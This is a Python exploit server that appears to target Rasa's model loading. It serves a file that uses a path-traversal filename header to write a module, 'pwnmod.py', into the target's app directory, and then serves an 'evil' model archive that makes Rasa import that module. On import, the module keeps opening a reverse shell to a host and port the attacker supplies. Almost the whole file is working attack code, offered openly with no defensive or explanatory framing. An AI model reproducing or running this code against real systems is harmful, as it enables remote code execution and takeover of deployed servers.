import argparse import datetime import http.server import socketserver from pathlib import Path from typing import List BASE_DIR = Path(__file__).resolve().parent DEFAULT_EVIL_MODEL = BASE_DIR / "evil_import_model.tar.gz" def build_pwnmod(reverse_host: str, reverse_port: int) -> bytes: """Build pwnmod.py for the Rasa graph import chain.""" payload = f"""import os import pty import socket import threading import time def _launch(): # Runs when Python imports pwnmod. It keeps trying to connect back. while True: s = None try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("{reverse_host}", {reverse_port})) os.dup2(s.fileno(), 0) os.dup2(s.fileno(), 1) os.dup2(s.fileno(), 2) pty.spawn("/bin/sh") except Exception: pass finally: try: if s: s.close() except Exception: pass time.sleep(5) # Import side effect: Rasa imports pwnmod before it gets Pwn. threading.Thread(target=_launch, daemon=True).start() class Pwn: @classmethod def load(cls, config=None, model_storage=None, resource=None, execution_context=None, **kwargs): return cls() @staticmethod def get_default_config(): return {{}} def provide(self, **kwargs): return None """ return payload.encode("utf-8") class Handler(http.server.BaseHTTPRequestHandler): server_version = "RasaStage2/1.0" def do_GET(self) -> None: if self.path.startswith("/write-module"): # First request: abuse the model-server filename header to write /app/pwnmod.py. self.server.hits.append(self._hit("write-module")) self._send_file( self.server.pwnmod, "text/plain; charset=utf-8", self.server.module_filename, "stage2-write-module", ) return if self.path.startswith("/model"): # Second request: serve the model whose metadata.json uses pwnmod.Pwn. self.server.hits.append(self._hit("model")) self._send_file( self.server.evil_model.read_bytes(), "application/x-tar", self.server.model_filename, "stage2-evil-model", ) return if self.path.startswith("/hits"): body = "\n".join(self.server.hits).encode("utf-8") + b"\n" self._send_file(body, "text/plain; charset=utf-8", "hits.txt", "hits") return if self.path.startswith("/healthz"): self._send_file(b"ok\n", "text/plain; charset=utf-8", "healthz.txt", "healthz") return self.send_response(404) self.end_headers() self.wfile.write(b"not found\n") def _hit(self, route: str) -> str: ts = datetime.datetime.utcnow().isoformat(timespec="seconds") + "Z" return f"{ts} {self.client_address[0]} {self.command} {self.path} {route}" def _send_file(self, body: bytes, content_type: str, filename: str, etag: str) -> None: self.send_response(200) self.send_header("Content-Type", content_type) self.send_header("Content-Length", str(len(body))) self.send_header("ETag", etag) self.send_header("filename", filename) self.end_headers() self.wfile.write(body) def log_message(self, fmt: str, *args) -> None: print(f"{self.address_string()} - {fmt % args}", flush=True) class ThreadingTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer): allow_reuse_address = True pwnmod: bytes evil_model: Path module_filename: str model_filename: str hits: List[str] def main() -> None: parser = argparse.ArgumentParser(description="Minimal Rasa stage2 model server") parser.add_argument("--listen", default="0.0.0.0") parser.add_argument("--port", type=int, default=8000) parser.add_argument("--reverse-host", required=True) parser.add_argument("--reverse-port", type=int, default=4444) parser.add_argument("--evil-model", type=Path, default=DEFAULT_EVIL_MODEL) parser.add_argument("--module-filename", default="../../app/pwnmod.py") parser.add_argument("--model-filename", default="evil_import_model.tar.gz") args = parser.parse_args() if not args.evil_model.exists(): raise SystemExit(f"missing evil model archive: {args.evil_model}") with ThreadingTCPServer((args.listen, args.port), Handler) as httpd: httpd.pwnmod = build_pwnmod(args.reverse_host, args.reverse_port) httpd.evil_model = args.evil_model httpd.module_filename = args.module_filename httpd.model_filename = args.model_filename httpd.hits = [] base = f"http://{args.listen}:{args.port}" print(f"listening: {base}", flush=True) print(f"write module url: {base}/write-module", flush=True) print(f"evil model url: {base}/model", flush=True) print(f"reverse shell: {args.reverse_host}:{args.reverse_port}", flush=True) httpd.serve_forever() if __name__ == "__main__": main()